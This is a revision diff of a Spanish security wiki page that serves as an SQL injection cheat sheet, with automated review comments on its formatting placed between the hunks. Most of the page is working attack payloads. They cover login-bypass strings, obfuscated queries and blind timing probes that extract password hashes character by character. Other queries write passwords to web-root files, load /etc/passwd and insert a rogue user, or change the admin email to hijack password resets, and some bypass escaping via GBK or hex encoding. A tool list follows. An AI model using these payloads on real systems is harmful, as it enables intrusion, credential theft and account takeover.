seguridad:sql_injection [2013/03/18 09:36] – [SQL Injection] lc
seguridad:sql_injection [2023/01/18 14:11] (current) – external editor 127.0.0.1
Línea 1: Línea 1:
 ==== SQL Injection ==== ==== SQL Injection ====
 === Técnicas === === Técnicas ===
 +<file>
   * /**/   * /**/
   * /*--*/   * /*--*/
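Review bot: the <file> tag opened on the first added line wraps the bullet list of comment and whitespace tokens (/**/, %0A, ...) and is only closed in the next hunk; every other block this revision adds uses <code>, so use <code> here as well for consistency, or keep <file> but add one lead sentence saying the items are quoted literally and are not wiki list syntax.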
Línea 7: Línea 8:
   * %0A   * %0A
   * %0D   * %0D
 +</file>
  
-<note>Extraido de 0x000000.com</note>+=== Técnicas extraidas de 0x000000.com  === 
 +<code sql>
 1 SELECT * FROM login /* foobar */ 1 SELECT * FROM login /* foobar */
 2 SELECT * FROM login WHERE id = 1 or 1=1 2 SELECT * FROM login WHERE id = 1 or 1=1
 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
 +</code>
 Use inside login form: Use inside login form:
 +<code>
 01 1' OR 1=1-- 01 1' OR 1=1--
 02 1' OR '1' = '1 02 1' OR '1' = '1
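Review bot: the new heading "=== Técnicas extraidas de 0x000000.com  ===" is missing its accent (extraídas) and has a double space before the closing ===; it does keep the attribution to 0x000000.com that the removed <note> carried, which is right. The code blocks added in this hunk also copy the source site's line numbers into the block content ("1 SELECT * FROM login /* foobar */"), and the block after "Use inside login form:" is plain <code> while the one above it is <code sql>; strip the numbers and tag both as <code sql> so the statements render and copy cleanly.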
Línea 35: Línea 39:
 20 ' or a=a-- 20 ' or a=a--
 21 " or "a"="a 21 " or "a"="a
 +</code>
 Variations: Variations:
 +<code sql>
 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
Línea 48: Línea 53:
 10 SELECT host,user,db from mysql.db 10 SELECT host,user,db from mysql.db
 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db; 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db;
 +</code>
 Blind injection vectors collection Blind injection vectors collection
 +<code sql>
 Operators Operators
 +
 1 SELECT 1 && 1; 1 SELECT 1 && 1;
 2 SELECT 1 || 1; 2 SELECT 1 || 1;
 3 SELECT 1 XOR 0; 3 SELECT 1 XOR 0;
 +</code> 
 +<code sql>
 Evaluate Evaluate
 1 all render TRUE or 1. 1 all render TRUE or 1.
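Review bot: the "Operators" caption, together with the added blank line, ends up inside the <code sql> block that follows "Blind injection vectors collection", so it is highlighted as (invalid) SQL instead of rendered as a label; the same happens with "Evaluate", "Math", "Misc" and "Benchmark" in the following hunks, and the line "1 all render TRUE or 1." under Evaluate is commentary rather than a query. Close each block before its caption, as "Use inside login form:" and "Variations:" already are, and keep only the SELECT statements inside the fences.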
Línea 60: Línea 68:
 3 SELECT 2 >= 2; 3 SELECT 2 >= 2;
 4 SELECT ISNULL(1/0); 4 SELECT ISNULL(1/0);
 +</code> 
 +<code sql>
 Math Math
 1 SELECT FLOOR(7 + (RAND() * 5)); 1 SELECT FLOOR(7 + (RAND() * 5));
 2 SELECT ROUND(23.298, -1); 2 SELECT ROUND(23.298, -1);
 +</code> 
 +<code sql>
 Misc Misc
 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000))); 1 SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
 2 SELECT MD5('abc'); 2 SELECT MD5('abc');
 +</code> 
 +<code sql>
 Benchmark Benchmark
 01 SELECT BENCHMARK(10000000,ENCODE('abc','123')); 01 SELECT BENCHMARK(10000000,ENCODE('abc','123'));
Línea 81: Línea 92:
 10 Using the timeout to check if user exists 10 Using the timeout to check if user exists
 11 SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login 11 SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
 +</code>
 Beware of of the N rounds, add an extra zero and it could stall or crash your browser! Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
 Gathering info Gathering info
 +<code sql>
 Table mapping Table mapping
 1 SELECT COUNT(*) FROM tablename 1 SELECT COUNT(*) FROM tablename
 +</code> 
 +<code sql>
 Field mapping Field mapping
 1 SELECT * FROM tablename WHERE user LIKE "%root%" 1 SELECT * FROM tablename WHERE user LIKE "%root%"
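Review bot: the unchanged warning line "Beware of of the N rounds ..." has a doubled "of"; since this hunk already edits the lines around it, fix it here. "Gathering info" is a section label left as plain text between two blocks, while "Table mapping" and "Field mapping" are placed inside the <code sql> blocks; make "Gathering info" a === heading like the other sections on the page and move the two mapping captions out of the fences.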
Línea 92: Línea 105:
 3 SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL; 3 SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL; 4 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
 +</code> 
 +<code sql>
 User mapping User mapping
 1 SELECT * FROM tablename WHERE email = 'user@site.com'; 1 SELECT * FROM tablename WHERE email = 'user@site.com';
 2 SELECT * FROM tablename WHERE user LIKE "%root%" 2 SELECT * FROM tablename WHERE user LIKE "%root%"
 3 SELECT * FROM tablename WHERE user = 'username' 3 SELECT * FROM tablename WHERE user = 'username'
 +</code> 
 +<code sql>
 Advanced SQL vectors Advanced SQL vectors
 Writing info into files. Writing info into files.
 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt' 1 SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'
 +</code> 
 +<code sql>
 Writing info into files without single quotes: (example) Writing info into files without single quotes: (example)
 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110), 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110), 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
 3 CHAR( 39)) 3 CHAR( 39))
- 
 Note: You must specify a new file, it may not exists and give the correct pathname. Note: You must specify a new file, it may not exists and give the correct pathname.
 +</code> 
 +<code sql>
 The CHAR() quoteless function. The CHAR() quoteless function.
 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105), 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
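Review bot: removing the blank line after the CHAR()/INTO OUTFILE statement leaves the prose "Note: You must specify a new file, it may not exists and give the correct pathname." inside the <code sql> block that is closed right after it; close the block before the note and, while there, fix the grammar ("the file must not already exist, and the full pathname must be correct"). "Advanced SQL vectors", "Writing info into files." and "Writing info into files without single quotes: (example)" at the top of the same blocks, and "The CHAR() quoteless function." in the next one, are captions as well and belong outside the fences.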
Línea 114: Línea 130:
 3   3  
 4 SELECT * FROM login WHERE user = CHAR(39,97,39) 4 SELECT * FROM login WHERE user = CHAR(39,97,39)
 +</code> 
 +<code sql>
 Extracting hashes Extracting hashes
 1 SELECT user FROM login WHERE user = 'root' 1 SELECT user FROM login WHERE user = 'root'
 2 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login 2 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login
 +</code>
 This evaluates the first char of the password hash from user 'root' which is 'a' (ASCII 97). This evaluates the first char of the password hash from user 'root' which is 'a' (ASCII 97).
  
Línea 124: Línea 141:
  
 The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example.
 +<code sql>
 01 SELECT user FROM login WHERE user = 'admin' 01 SELECT user FROM login WHERE user = 'admin'
 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1 02 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login1
Línea 135: Línea 153:
 10 is like: (password,1,3) this selects: 'abc' 10 is like: (password,1,3) this selects: 'abc'
 11 is like: (password,1,4) this selects: 'abcd' 11 is like: (password,1,4) this selects: 'abcd'
 +</code>
 A quoteless example: A quoteless example:
 +<code sql>
 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login 2 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
 +</code>
 Possible chars Possible chars
 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
 Misc. Misc.
 Insert a new user into DB Insert a new user into DB
 +<code sql>
 1 INSERT INTO login SET user = 'r00t', pass = 'abc' 1 INSERT INTO login SET user = 'r00t', pass = 'abc'
 +</code>
 Retrieve /etc/passwd file, put it into a field and insert a new user. Retrieve /etc/passwd file, put it into a field and insert a new user.
-1 load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'+<code>1 load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'</code>
  
 Then login! Then login!
  
 Write the DB user away into tmp Write the DB user away into tmp
-1 SELECT host,user,password FROM user into outfile '/tmp/passwd';+<code sql>1 SELECT host,user,password FROM user into outfile '/tmp/passwd';</code>
  
 Change admin e-mail, for "forgot login retrieval." Change admin e-mail, for "forgot login retrieval."
-1 UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';+<code>1 UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';</code>
  
 Bypassing PHP functions Bypassing PHP functions
 Bypassing addslashes() with GBK HEX encoding. Bypassing addslashes() with GBK HEX encoding.
-1 WHERE x = 0xbf27 admin 0xbf27+<code>1 WHERE x = 0xbf27 admin 0xbf27</code>
  
 Using an HEX encoded query to bypass escaping. Using an HEX encoded query to bypass escaping.
 +<code sql>
 1 Normal: SELECT * FROM login WHERE user = 'root' 1 Normal: SELECT * FROM login WHERE user = 'root'
 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74
 +</code>
 Inserting a new user in SQL. Inserting a new user in SQL.
 +<code>
 1 Normal: insert into login set user = 'root', pass = 'root' 1 Normal: insert into login set user = 'root', pass = 'root'
 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74
 +</code>
 How to determin the HEX value for injection. How to determin the HEX value for injection.
-1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.+<code sql>1 SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.</code>
  
 With comments. With comments.
 +<code>
 1 S/**/E/**/L/**/E/**/C/**/T * F/**/R/**/O/**/M l/**/o/**/g/**/i/**/n 1 S/**/E/**/L/**/E/**/C/**/T * F/**/R/**/O/**/M l/**/o/**/g/**/i/**/n
 2 W/**/H/**/E/**/R/**/E u/**/s/**/e/**/r = 0x726F6F74 2 W/**/H/**/E/**/R/**/E u/**/s/**/e/**/r = 0x726F6F74
 +</code>
 Bypassing mysql_real_escape_string() with BIG5 or GBK Bypassing mysql_real_escape_string() with BIG5 or GBK
-1 "injection string" に関する追加情報:+<code>1 "injection string" に関する追加情報:</code>
  
 (MySQL 4.1.x before 4.1.20 and 5.0.x)  (MySQL 4.1.x before 4.1.20 and 5.0.x) 
  
  
-=== Herramientas === +==== Herramientas ==== 
-Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/+  Havij -> http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/ 
 +  * Havij http://www.taringa.net/comunidades/hackers/3552526/ 
 +  * PonyMagic http://poneymagic.diosdelared.com 
 +  * General Injection Explorer  
 +  * Safe 3 sql injector http://sourceforge.net/projects/safe3si/files/latest/download?source=directory 
 +  * Enema http://code.google.com/p/enema/ 
 +  * Absinthe http://sourceforge.net/projects/absinthe/ 
 +  * Pangolin http://nosec.org/en/productservice/pangolin/ 
 +  * sql poison 
 +  * sql map gui 
 +  * bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ 
 +  * 
  
  
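Review bot: tagging is inconsistent in this hunk: the one-line blocks for "load data infile ...", "UPDATE users set email ...", "WHERE x = 0xbf27 ..." and the "With comments." block are plain <code>, while the neighbouring INSERT, "SELECT host,user,password ... into outfile" and HEX() examples are <code sql>; all of them are SQL, so tag them all <code sql>. The block <code>1 "injection string" に関する追加情報:</code> under "Bypassing mysql_real_escape_string() with BIG5 or GBK" is not a query: the Japanese text reads "additional information regarding", a heading fragment copied from the source page, and the following "(MySQL 4.1.x before 4.1.20 and 5.0.x)" line is the actual affected-version note, so drop the fragment and keep only that line. In the Herramientas list, Havij appears twice (once as an unbulleted "Havij ->" line with the itsecteam URL, once as a bullet with a taringa URL), the final bullet is empty, and "General Injection Explorer", "sql poison" and "sql map gui" carry no link; merge the two Havij entries and remove the empty bullet and the unlinked entries. Changing the heading from === to ==== does match the "==== Referencias ====" level below, so that part is fine.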
Línea 189: Línea 223:
 ==== Referencias ==== ==== Referencias ====
   * http://ha.ckers.org/sqlinjection/   * http://ha.ckers.org/sqlinjection/
 +  * http://www.antrax-labs.org/2012/01/sql-injection-desde-cero.html